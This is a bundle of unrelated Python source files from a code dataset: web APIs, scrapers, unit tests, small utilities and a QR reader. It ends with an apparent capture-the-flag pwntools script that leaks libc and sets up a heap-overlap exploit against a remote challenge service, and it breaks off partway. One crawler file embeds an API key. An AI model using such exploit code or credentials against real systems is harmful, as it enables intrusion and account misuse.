session.query(otu.lowest_taxonomic_unit_found).all()\n\n otu_results = []\n\n for result in results:\n otu_results.append(result[0])\n\n return jsonify(otu_results)\n\n@app.route('/metadata/')\ndef sample_meta(sample):\n sample_id = sample[3:]\n result = session.query(Mtadata.AGE, Mtadata.BBTYPE, Mtadata.ETHNICITY, Mtadata.GENDER, Mtadata.LOCATION,\\\n Mtadata.SAMPLEID).filter(Mtadata.SAMPLEID==sample_id).first()\n\n metadict = {\n \"AGE\": result[0],\n \"BBTYPE\": result[1],\n \"ETHNICITY\": result[2],\n \"GENDER\": result[3],\n \"LOCATION\": result[4],\n \"SAMPLEID\": result[5]\n }\n return jsonify(metadict)\n\n# Washing frequency\n@app.route('/wfreq/')\ndef wfreq(sample):\n sample_id = sample[3:]\n result = session.query(Mtadata.WFREQ, Mtadata.SAMPLEID)\\\n .filter(Mtadata.SAMPLEID == sample_id).first()\n return jsonify(result[0])\n\n# OTU IDs and sample values\n@app.route('/samples/')\ndef samp(sample):\n sample_id_query = f\"Samples.{sample}\"\n results = session.query(Samples.otu_id,\\\n sample_id_query)\\\n .order_by(desc(sample_id_query))\n sampdict = {\"otu_ids\": [result[0] for result in results],\n \"sample_values\": [result[1] for result in results]}\n return jsonify(sampdict)\n\n\nif __name__ == \"__main__\":\n app.run()\n\n\n","sub_path":"BellyButton/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"544632010","text":"import webbrowser\nimport time\n\ntotal = 3\ncount = 0\n\nprint(\"this program started on \"+time.ctime())\nwhile(count < total):\n time.sleep(2*60*60)\n webbrowser.open(\"https://www.youtube.com/watch?v=-bNwqXvMuB8\")\n count += 1","sub_path":"takeAbreak.py","file_name":"takeAbreak.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194759514","text":"# import os\n# import ConfigParser\nimport logging\nimport time\nimport lib.getconfig\n# import datetime\n# import json\n# import pushdata\n\n# config = ConfigParser.RawConfigParser()\n# config.read(os.path.split(os.path.dirname(__file__))[0] + '/conf/config.ini')\n# tsdb_url = config.get('TSDB', 'url')\n#c = pycurl.Curl()\n\ncluster_name = lib.getconfig.getparam('SelfConfig', 'cluster_name')\nhost_group = lib.getconfig.getparam('SelfConfig', 'host_group')\ndebug_log = lib.getconfig.getparam('SelfConfig', 'debug_log')\ntsdb_type = lib.getconfig.getparam('TSDB', 'tsdtype')\nlog_file = lib.getconfig.getparam('SelfConfig', 'log_file')\n\ndef print_message(message):\n logger = logging.getLogger(\"PuyPuy\")\n logger.setLevel(logging.INFO)\n logging.basicConfig(filename=log_file, level=logging.INFO)\n logging.info(str(time.strftime(\" [%F %H %M:%S] \")) + message)\n\n# def print_error(module, e):\n# def send_error_msg():\n# if pushdata.tsd_oddeye is True:\n# cluster_name = config.get('SelfConfig', 'cluster_name')\n# error_msg = str(e).replace('[', '').replace(']', '').replace('<', '').replace('>', '').replace('(', '').replace(')', '').replace(\"'\", '').replace('\"', '')\n# timestamp = int(datetime.datetime.now().strftime(\"%s\"))\n# error_data = []\n# error_data.append({\"metric\": module,\n# \"timestamp\": timestamp,\n# \"value\": 16,\n# \"message\": error_msg,\n# \"status\": \"ERROR\",\n# \"type\": \"Special\",\n# \"reaction\": pushdata.negative_handler,\n# \"tags\": {\"host\": pushdata.hostname, \"cluster\": cluster_name, \"group\": host_group}})\n# send_err_msg = json.dumps(error_data)\n# if pushdata.sandbox is True:\n# barlus_style = 'UUID=' + pushdata.oddeye_uuid + '&sandbox=true&data='\n# else:\n# barlus_style = 'UUID=' + pushdata.oddeye_uuid + '&data='\n#\n# send_error_data = barlus_style + send_err_msg\n#\n# jonson=pushdata.JonSon()\n#\n# def httt_set_opt(url, data):\n# c.setopt(pycurl.URL, url)\n# c.setopt(pycurl.POST, 0)\n# c.setopt(pycurl.POSTFIELDS, data)\n# c.setopt(pycurl.VERBOSE, 0)\n# c.setopt(pycurl.TIMEOUT, 3)\n# c.setopt(pycurl.NOSIGNAL, 5)\n# c.setopt(pycurl.USERAGENT, 'PuyPuy v.03')\n# c.setopt(pycurl.ENCODING, \"gzip,deflate\")\n# c.setopt(pycurl.WRITEFUNCTION, lambda x: None)\n#\n# httt_set_opt(pushdata.tsdb_url, send_error_data)\n# c.setopt(pycurl.POSTFIELDS, send_error_data)\n# c.perform()\n# print_message(\" %s : \" % module + str(e))\n# else:\n# print_message(\" %s : \" % module + str(e))\n# try:\n# if module == 'pushdata':\n# print_message(\" %s : \" % \"Cannot connect to Barlus\" + str(e))\n# pass\n# else:\n# send_error_msg()\n# except Exception as err:\n# print_message(\" %s : \" % \"Cannot send error\" + str(err))\n\n","sub_path":"lib/puylogger.py","file_name":"puylogger.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"205409373","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors. All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\" Site properties export / import unit tests.\n\n$Id$\n\"\"\"\n\nimport unittest\nimport Testing\nimport Zope\nZope.startup()\n\nfrom OFS.Folder import Folder\n\nfrom common import BaseRegistryTests\nfrom common import DummyExportContext\nfrom common import DummyImportContext\n\n\n_EMPTY_EXPORT = \"\"\"\\\n\n\n\n\"\"\"\n\n_NORMAL_EXPORT = \"\"\"\\\n\n\n Foo\n \n \n\n\"\"\"\n\n\nclass DummySite(Folder):\n\n _properties = ()\n\n\nclass _SitePropertiesSetup(BaseRegistryTests):\n\n def _initSite(self, foo=2, bar=2):\n\n self.root.site = DummySite()\n site = self.root.site\n\n if foo > 0:\n site._setProperty('foo', '', 'string')\n if foo > 1:\n site._updateProperty('foo', 'Foo')\n\n if bar > 0:\n site._setProperty( 'bar', (), 'tokens' )\n if bar > 1:\n site._updateProperty( 'bar', ('Bar',) )\n\n return site\n\n\nclass SitePropertiesConfiguratorTests(_SitePropertiesSetup):\n\n def _getTargetClass(self):\n\n from Products.CMFSetup.properties import SitePropertiesConfigurator\n return SitePropertiesConfigurator\n\n def test_listSiteInfos_normal(self):\n\n site = self._initSite()\n\n EXPECTED = [ { 'id': 'foo',\n 'value': 'Foo',\n 'elements': (),\n 'type': 'string',\n 'select_variable': None },\n { 'id': 'bar',\n 'value': '',\n 'elements': ('Bar',),\n 'type': 'tokens',\n 'select_variable': None } ]\n\n configurator = self._makeOne(site)\n\n site_info = configurator.listSiteInfos()\n self.assertEqual( len(site_info), len(EXPECTED) )\n\n for found, expected in zip(site_info, EXPECTED):\n self.assertEqual(found, expected)\n\n def test_generateXML_empty(self):\n\n site = self._initSite(0, 0)\n configurator = self._makeOne(site).__of__(site)\n\n self._compareDOM(configurator.generateXML(), _EMPTY_EXPORT)\n\n def test_generateXML_normal(self):\n\n site = self._initSite()\n configurator = self._makeOne(site).__of__(site)\n\n self._compareDOM( configurator.generateXML(), _NORMAL_EXPORT )\n\n def test_parseXML_empty(self):\n\n site = self._initSite(0, 0)\n configurator = self._makeOne(site)\n site_info = configurator.parseXML(_EMPTY_EXPORT)\n\n self.assertEqual( len( site_info['properties'] ), 0 )\n\n def test_parseXML_normal(self):\n\n site = self._initSite()\n configurator = self._makeOne(site)\n site_info = configurator.parseXML(_NORMAL_EXPORT)\n\n self.assertEqual( len( site_info['properties'] ), 2 )\n\n info = site_info['properties'][0]\n self.assertEqual( info['id'], 'foo' )\n self.assertEqual( info['value'], 'Foo' )\n self.assertEqual( len( info['elements'] ), 0 )\n\n info = site_info['properties'][1]\n self.assertEqual( info['id'], 'bar' )\n self.assertEqual( info['value'], '' )\n self.assertEqual( len( info['elements'] ), 1 )\n self.assertEqual( info['elements'][0], 'Bar' )\n\n\nclass Test_exportSiteProperties(_SitePropertiesSetup):\n\n def test_empty(self):\n\n site = self._initSite(0, 0)\n context = DummyExportContext(site)\n\n from Products.CMFSetup.properties import exportSiteProperties\n exportSiteProperties(context)\n\n self.assertEqual( len(context._wrote), 1 )\n filename, text, content_type = context._wrote[0]\n self.assertEqual(filename, 'properties.xml')\n self._compareDOM(text, _EMPTY_EXPORT)\n self.assertEqual(content_type, 'text/xml')\n\n def test_normal(self):\n\n site = self._initSite()\n context = DummyExportContext( site )\n\n from Products.CMFSetup.properties import exportSiteProperties\n exportSiteProperties(context)\n\n self.assertEqual( len(context._wrote), 1 )\n filename, text, content_type = context._wrote[0]\n self.assertEqual(filename, 'properties.xml')\n self._compareDOM(text, _NORMAL_EXPORT)\n self.assertEqual(content_type, 'text/xml')\n\n\nclass Test_importSiteProperties(_SitePropertiesSetup):\n\n def test_empty_default_purge(self):\n\n site = self._initSite()\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n context = DummyImportContext(site)\n context._files['properties.xml'] = _EMPTY_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n def test_empty_explicit_purge(self):\n\n site = self._initSite()\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n context = DummyImportContext(site, True)\n context._files['properties.xml'] = _EMPTY_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n def test_empty_skip_purge(self):\n\n site = self._initSite()\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n context = DummyImportContext(site, False)\n context._files['properties.xml'] = _EMPTY_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n def test_normal(self):\n\n site = self._initSite(0,0)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n context = DummyImportContext(site)\n context._files['properties.xml'] = _NORMAL_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n def test_normal_encode_as_ascii(self):\n\n site = self._initSite(0,0)\n\n self.assertEqual( len( site.propertyIds() ), 0 )\n\n context = DummyImportContext(site, encoding='ascii')\n context._files['properties.xml'] = _NORMAL_EXPORT\n\n from Products.CMFSetup.properties import importSiteProperties\n importSiteProperties(context)\n\n self.assertEqual( len( site.propertyIds() ), 2 )\n self.failUnless( 'foo' in site.propertyIds() )\n self.assertEqual( site.getProperty('foo'), 'Foo' )\n self.failUnless( 'bar' in site.propertyIds() )\n self.assertEqual( site.getProperty('bar'), ('Bar',) )\n\n\ndef test_suite():\n return unittest.TestSuite((\n unittest.makeSuite(SitePropertiesConfiguratorTests),\n unittest.makeSuite(Test_exportSiteProperties),\n unittest.makeSuite(Test_importSiteProperties),\n ))\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n","sub_path":"CMF/tags/1.5.2-beta/CMFSetup/tests/test_properties.py","file_name":"test_properties.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"450309733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 30 19:55:50 2016\n\n@author: vilius\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\n#All classes and functions performed by cells\n\n#Just cell description:\nclass Cell:\n def __init__(self, posx, posy, goal):\n self.x = posx\n self.y = posy\n self.xnew = self.x\n self.ynew = self.y\n self.goal = goal\n \n #Check if the cell spawned inside the goal\n if self.x >= self.goal.x[1] or self.x <= self.goal.x[0]:\n self.arr = False\n return \n if self.y >= self.goal.y[1] or self.y <= self.goal.y[0]:\n self.arr = False \n return \n self.arr = True \n return\n \n \n #See this cell's position relatively to other cell.\n def position(self, cell):\n if self==cell:\n return np.array([0,0])\n #Gives distance to another cell\n dist = np.sqrt((self.x - cell.x)**2 + (self.y - cell.y)**2 )\n #Gives unit vector of the direction:\n n = np.array([cell.x - self.x , cell.y - self.y]) / dist\n return n \n\n\n \"\"\"\n def arrived(self):\n if self.x >= goal.x[1] or self.x <= goal.x[0]:\n self.arr = False\n return \n if self.y >= goal.y[1] or self.y <= goal.y[0]:\n self.arr = False \n return \n self.arr = True\n return \n \"\"\"\n\n \n def move(self, xmove, ymove):\n self.xnew += xmove\n self.ynew += ymove\n return\n \n #function to update position\n def update(self):\n self.x = self.xnew\n self.y = self.ynew\n self.xnew = self.x\n self.ynew = self.y\n \n if self.x >= self.goal.x[1] or self.x <= self.goal.x[0]:\n self.arr = False\n return \n if self.y >= self.goal.y[1] or self.y <= self.goal.y[0]:\n self.arr = False \n return \n self.arr = True \n \n return\n \n\n","sub_path":"Cell.py","file_name":"Cell.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"377710702","text":"seq = 0\nwhile True:\n try:\n n, m, c = map(int, input().split())\n if n == m == c == 0:\n break\n seq += 1\n n_amperes = [0]*21\n n_switch = [0]*21\n total = 0\n maxTotal = 0\n s = 'Fuse was not blown.'\n for i in range(1, n + 1):\n n_amperes[i] = int(input())\n for i in range(1, m + 1):\n oper = int(input())\n if n_switch[oper] == 0:\n n_switch[oper] = 1\n total += n_amperes[oper]\n if total > maxTotal:\n maxTotal = total\n if total > c:\n s = 'Fuse was blown.'\n else:\n n_switch[oper] = 0\n total -= n_amperes[oper]\n print('Sequence ', seq)\n print(s)\n if s == 'Fuse was not blown.':\n print('Maximal power consumption was ', maxTotal, ' amperes.')\n print()\n except:\n break","sub_path":"Burning Fuses.py","file_name":"Burning Fuses.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"32744553","text":"from tornado.testing import AsyncTestCase, gen_test\nfrom tornado.util import ObjectDict\nfrom unittest.mock import patch\nimport json\nfrom datetime import datetime\nfrom schema.thing import Thing, Data\nfrom objects.table import Record, Table\nfrom tests.base import AsyncMock\nfrom motorengine.queryset import QuerySet\nfrom motorengine import connect\n\n\nclass TestRecord(AsyncTestCase):\n\n def setUp(self):\n connect(\"dt\", host=\"mongodb://localhost:27017/dt\")\n super(TestRecord, self).setUp()\n\n def tearDown(self):\n super(TestRecord, self).tearDown()\n\n def test_record_creation(self):\n r = Record(\"News\", 1, {\"name\": \"CNNIBN\"})\n self.assertIsNotNone(r)\n self.assertEqual(r.name, \"CNNIBN\")\n self.assertEqual(r._id, 1)\n\n @patch.object(Thing, 'add', new_callable=AsyncMock)\n @patch.object(Data, 'add', new_callable=AsyncMock)\n @gen_test\n def test_record_put_add(self, add_mock, tng_mock):\n r = Record(\"News\", None, {\"name\": \"CNNIBN\"})\n yield r.put()\n self.assertTrue(add_mock.called)\n self.assertTrue(tng_mock.called)\n\n @patch.object(Data, 'update', new_callable=AsyncMock)\n @gen_test\n def test_record_put_update(self, update_mock):\n r = Record(\"News\", 1, {\"name\": \"CNNIBN\"})\n yield r.put()\n self.assertTrue(update_mock.called)\n\n\nclass TestTable(AsyncTestCase):\n\n def setUp(self):\n connect(\"dt\", host=\"mongodb://localhost:27017/dt\")\n super(TestTable, self).setUp()\n\n def tearDown(self):\n super(TestTable, self).tearDown()\n\n def test_table_instation(self):\n t = Table(\"Cache\", ['key', 'value'])\n self.assertIsNotNone(t)\n\n @patch.object(Table, '_fetch_data', new_callable=AsyncMock)\n @gen_test\n def test_get(self, call_mock):\n t = Table(\"Cache\", ['key', 'value'])\n yield t.get(1)\n self.assertTrue(call_mock.called)\n\n @patch.object(QuerySet, 'find_all', new_callable=AsyncMock)\n @gen_test\n def test_fetch_thing(self, find_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n yield t._fetch_thing(1)\n self.assertTrue(find_mock.called)\n\n @patch.object(Table, '_fetch_thing', new_callable=AsyncMock)\n @patch.object(QuerySet, 'find_all', new_callable=AsyncMock)\n @gen_test\n def test_fetch_data(self, find_mock, fetch_mock):\n\n fetch_mock.return_value = [ObjectDict(name=\"Cache\",\n thing_id=1,\n reads=0)]\n find_mock.return_value = [ObjectDict(thing_id=1,\n key=\"Key\",\n value=\"Value\"),\n ObjectDict(thing_id=1,\n key=\"Key1\",\n value=\"Value2\")]\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t._fetch_data(1)\n self.assertTrue(find_mock.called)\n self.assertEqual(result, dict(id=1, Key=\"Value\", Key1=\"Value2\"))\n\n @patch.object(Record, 'put', new_callable=AsyncMock)\n @gen_test\n def test_new(self, rec_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t.new(dict(key=\"k\", value=\"v\"))\n self.assertIsNotNone(result)\n\n @patch.object(Record, 'put', new_callable=AsyncMock)\n @gen_test\n def test_update(self, rec_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t.update(1, dict(key=\"k\", value=\"v\"))\n self.assertIsNotNone(result)\n\n @patch.object(Table, '_fetch_table', new_callable=AsyncMock)\n @patch.object(Table, '_fetch_data', new_callable=AsyncMock)\n @gen_test\n def test_list(self, data_mock, fetch_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n fetch_mock.return_value = ([ObjectDict(thing_id=1),\n ObjectDict(thing_id=2)], 0, 0)\n result = yield t.list()\n self.assertIsNotNone(result)\n\n @patch.object(Table, '_search_table', new_callable=AsyncMock)\n @gen_test\n def test_search(self, search_mock):\n t = Table(\"Cache\", [\"key\", \"value\"])\n search_mock.return_value = ([ObjectDict(thing_id=1),\n ObjectDict(thing_id=2)], 0, 0)\n result = yield t.search(\"hello\")\n self.assertIsNotNone(result)\n\n @patch.object(QuerySet, 'find_all', new_callable=AsyncMock)\n @gen_test\n def test_search_table(self, find_mock):\n\n find_mock.return_value = [ObjectDict(thing_id=1,\n key=\"Key\",\n value=\"Value\"),\n ObjectDict(thing_id=1,\n key=\"Key1\",\n value=\"Value2\")]\n t = Table(\"Cache\", [\"key\", \"value\"])\n result = yield t._search_table(\"hello\")\n self.assertTrue(find_mock.called)\n self.assertIsNotNone(result)\n","sub_path":"tests/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"299766245","text":"'''\r\nCreated on Sep 21, 2017\r\n\r\n@author: Lakshya\r\n'''\r\nimport Algorithmia\r\nimport json\r\n\r\n# The domain to crawl and number of links deep\r\n# More here: https://algorithmia.com/algorithms/web/SiteMap\r\ninp = [\"http://cic.du.ac.in\",1]\r\n\r\n# Replace YOUR API KEY with you free Algorithmia key\r\n# https://algorithmia.com/signup\r\nclient = Algorithmia.client('simVY53cJwH+o/riK0lcbdQR9fK1')\r\n\r\n# Here we call the Site Map algorithm\r\nres = client.algo('web/SiteMap/0.1.7').pipe(inp)\r\n\r\nsiteMap = res.result\r\n\r\nfor i in siteMap:\r\n print(i)\r\n \r\nlinks = []\r\noutput = []\r\n\r\n# Iterate through the key-value pairs from the site map graph\r\n# adding every URL to the links array\r\nfor keyLink in siteMap:\r\n links.append(keyLink)\r\n for valLink in siteMap[keyLink]:\r\n links.append(valLink)\r\n\r\n# Remove duplicate links from the links array \r\nlinks = list(set(links))\r\n\r\n# Iterate through the links calling Analyze URL on each \r\n# Then add the object to the output array\r\n# More here: https://algorithmia.com/algorithms/web/AnalyzeURL\r\nfor l in links:\r\n analyze = client.algo('web/AnalyzeURL/0.2.14').pipe(l)\r\n output.append(analyze.result)\r\n\r\n# Clean up JSON and print the result\r\nprint (json.dumps(output, indent=4))\r\nprint (json.__file__)\r\n","sub_path":"TF-IDF/AlgorithmiaCrawler.py","file_name":"AlgorithmiaCrawler.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5620991","text":"\r\nimport sqlite3\r\nimport os\r\nimport requests\r\nfrom io import StringIO\r\nimport pandas as pd\r\nimport datetime\r\nimport time\r\n\r\n\r\n# 爬取資料\r\ndef crawl_legal_person(date):\r\n # 將時間物件變成字串:'20180102'\r\n datestr = date.strftime('%Y%m%d')\r\n # 下載三大法人資料\r\n url = 'http://www.tse.com.tw/fund/T86?response=csv&date=' + datestr + '&selectType=ALLBUT0999'\r\n print(url)\r\n try:\r\n r = requests.get(url)\r\n except:\r\n return None\r\n # 製作三大法人的DataFrame\r\n try:\r\n df = pd.read_csv(StringIO(r.text), header=1).dropna(how='all', axis=1).dropna(how='any')\r\n except:\r\n return None\r\n # 微調整(為了配合資料庫的格式)\r\n # 刪除逗點\r\n df = df.astype(str).apply(lambda s: s.str.replace(',', ''))\r\n # 刪除空格\r\n df = df.astype(str).apply(lambda s: s.str.strip())\r\n # 刪除「證券代號」中的「\"」和「=」\r\n df['stock_id'] = df['證券代號'].str.replace('=', '').str.replace('\"', '')\r\n # 刪除「證券代號」這個欄位\r\n df = df.drop(['證券代號'], axis=1)\r\n # df['out_Buy'] = df['證券代號'].str.replace('=', '').str.replace('\"', '')\r\n # 設定index\r\n df['date'] = date\r\n df = df.set_index(['stock_id', 'date'])\r\n #設定欄位名稱\r\n df = df.rename(columns = { '外陸資買進股數(不含外資自營商)':'out_trust_buy',\r\n '外陸資賣出股數(不含外資自營商)':'out_trust_sell',\r\n '外陸資買賣超股數(不含外資自營商)':'out_trust_net',\r\n '外資自營商買進股數':'out_self_buy',\r\n '外資自營商賣出股數':'out_self_sell',\r\n '外資自營商買賣超股數':'out_self_net',\r\n '投信買進股數':'trust_buy',\r\n '投信賣出股數' :'trust_sell',\r\n '投信買賣超股數':'trust_net' ,\r\n '自營商買賣超股數':'self_totel_net' ,\r\n '自營商買進股數(自行買賣)':'self_buy' ,\r\n '自營商賣出股數(自行買賣)' :'self_out',\r\n '自營商買賣超股數(自行買賣)':'self_net' ,\r\n '自營商買進股數(避險)':'self_hedge_buy' ,\r\n '自營商賣出股數(避險)' :'self_hedge_sell' ,\r\n '自營商買賣超股數(避險)':'self_hedge_net',\r\n '三大法人買賣超股數':'total_net',\r\n '外資買進股數':'out_trust_buy',\r\n '外資賣出股數':'out_trust_sell',\r\n '外資買賣超股數':'out_trust_net',\r\n '自營商買進股數':'self_buy',\r\n '自營商賣出股數':'self_out'})\r\n # 將dataframe的型態轉成數字\r\n return df.apply(lambda s: pd.to_numeric(s, errors='coerce')).dropna(how='all', axis=1)\r\n\r\n\r\ndef is_doable(conn, chkdate, table = 'legal_person' ):\r\n c = conn.cursor()\r\n sql = 'select * from ' + table + ' where date(date) =\\'' + chkdate.strftime('%Y-%m-%d') + '\\';'\r\n rows = c.execute(sql).fetchall()\r\n print(sql + ' ' + str(len(rows)))\r\n\r\n if len(rows) > 0:\r\n c.close\r\n return False\r\n else:\r\n c.close\r\n return True\r\n\r\n\r\ndef main():\r\n # 打開資料庫\r\n conn = sqlite3.connect(os.path.join('data', 'stock.db'))\r\n\r\n #data handled from 20120501 ~ 20120716\r\n datelist = pd.date_range(start='20120716',end='20170915').tolist()\r\n for eachday in datelist:\r\n print('Now handling ' + eachday.strftime('%Y%m%d'))\r\n if is_doable(conn, eachday):\r\n df = crawl_legal_person(eachday)\r\n if df is None:\r\n continue\r\n else:\r\n df.to_sql('legal_person', conn, if_exists='append')\r\n print(df.head())\r\n time.sleep(2)\r\n else:\r\n print('duplicated data skip this date')\r\n\r\n # checkdate = datetime.date(2018, 9, 13)\r\n\r\n # 開啟GUI介面\r\n # widget(conn, 'legal_person', crawl_legal_person, date_range)\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"legalperson.py","file_name":"legalperson.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"401304174","text":"\"\"\"\nGiven a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list.\n\nFor example,\nGiven 1->2->3->3->4->4->5, return 1->2->5.\nGiven 1->1->1->2->3, return 2->3.\n\"\"\"\n\ndef deleteDuplicates(head):\n slow = ListNode(-1)\n slow.next = head\n head = slow\n\n while slow.next:\n fast = slow.next\n while fast.next and fast.val == fast.next.val:\n fast =fast.next \n if fast != slow.next: # This is delete \n slow.next = fast.next\n else:\n slow = slow.next # This is move\n\n return head.next","sub_path":"Linked-List/Remove-Duplicates-from-Sorted-List-II.py","file_name":"Remove-Duplicates-from-Sorted-List-II.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"272360261","text":"import cv2\nimport numpy as np\n\nfrom pyzbar.pyzbar import decode\n\n# img = cv2.imread('Qr/img.png')\ncap = cv2.VideoCapture(0)\ncap.set(3, 360)\ncap.set(4, 480)\n\nwhile True:\n succes, img = cap.read()\n for barcode in decode(img):\n myData = barcode.data.decode('utf-8')\n print(myData)\n pts = np.array([barcode.polygon], np.int32)\n pts = pts.reshape((-1, 1, 2))\n cv2.polylines(img, [pts], True, (255, 0, 0), 5)\n pts2 = barcode.rect\n #Cambiamos el color del cuadro si es una pag autorizada\n if myData == 'http://combizona.com':\n colorTxt = (255, 50, 50)\n else:\n colorTxt = (0, 0, 255)\n cv2.putText(img, myData, (pts2[0], pts2[1]), cv2.FONT_HERSHEY_SCRIPT_COMPLEX,\n 0.9, colorTxt, 2)\n cv2.imshow(\"Result\", img)\n cv2.waitKey(1)\n","sub_path":"QrTest.py","file_name":"QrTest.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"160833391","text":"#coding:utf-8\n\nfrom pwn import *\nimport argparse\n\n# env = os.environ\n# env['LD_PRELOAD'] = './libc64.so'\n\nIP = '154.8.174.214'\nPORT = '10001'\nbinary = './pwn'\ncontext.binary = binary\n\nio = None\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-d', '--debugger', action='store_true')\nparser.add_argument('-r', '--remote', action='store_true')\nparser.add_argument('-l', '--local', action='store_true')\nargs = parser.parse_args()\n\nsa = lambda x,y : io.sendafter(x,y)\nsl = lambda x : io.sendline(x)\nsd = lambda x : io.send(x)\nsla = lambda x,y : io.sendlineafter(x,y)\nrud = lambda x : io.recvuntil(x,drop=True)\nru = lambda x : io.recvuntil(x)\n\ndef lg(s, addr):\n print('\\033[1;31;40m%30s-->0x%x\\033[0m' % (s, addr))\n\nif args.remote:\n io = remote(IP, PORT) \n libc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n elf = ELF(binary)\nelif args.local or args.debugger:\n # env = {\"LD_PRELOAD\": os.path.join(os.getcwd(), \"libc.so.6\")}\n env = {}\n io = process(binary, env=env)\n elf = ELF(binary)\n proc_base = io.libs()[os.path.abspath(os.path.join(os.getcwd(), binary))]\n libc_bb = io.libs()['/lib/x86_64-linux-gnu/libc.so.6']\n libc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\nelse:\n parser.print_help()\n exit()\n\nlibc_base,__malloc_hook,system = None,None,None\ndef magic(offset):\n ru(\"\\x7f\")\n ru(\"\\x7f\")\n global libc_base,__malloc_hook,system\n leak = u64(ru(\"\\x7f\")[-6:].ljust(8,'\\x00'))\n lg('leak',leak)\n libc_base = leak - offset\n lg('base',libc_base)\n __malloc_hook = libc_base + libc.symbols['__malloc_hook']\n system = libc_base + libc.symbols['system']\n\n\ndef debug(msg=\"\"):\n msg = \"\"\"\n x/20xg 0x{:x}\n x/8xg 0x{:x}\n b *0x{:x}\n \"\"\".format(proc_base + 0x202080,\n proc_base + 0x202050,\n proc_base + 0xF43\n \n )\n\n pwnlib.gdb.attach(io,msg)\n\ndef add(sz):\n sla(\">>\",\"1\")\n sla(\"size\",str(sz))\n\ndef free(idx):\n sla(\">>\",\"2\")\n sla(\"idx\",str(idx))\n\ndef edit(idx,con):\n sla(\">>\",\"3\")\n sla(\"idx\",str(idx))\n sla(\"text\",con)\n \n\ndef exploit():\n add(0x90) #0\n add(0x68) #1\n add(0xf0) #2\n add(0x20) #3\n\n free(0)\n edit(1,'a' * 0x60 + p64(0x110))\n free(2) # unsorted \n\n free(1)\n add(0x90) #0\n 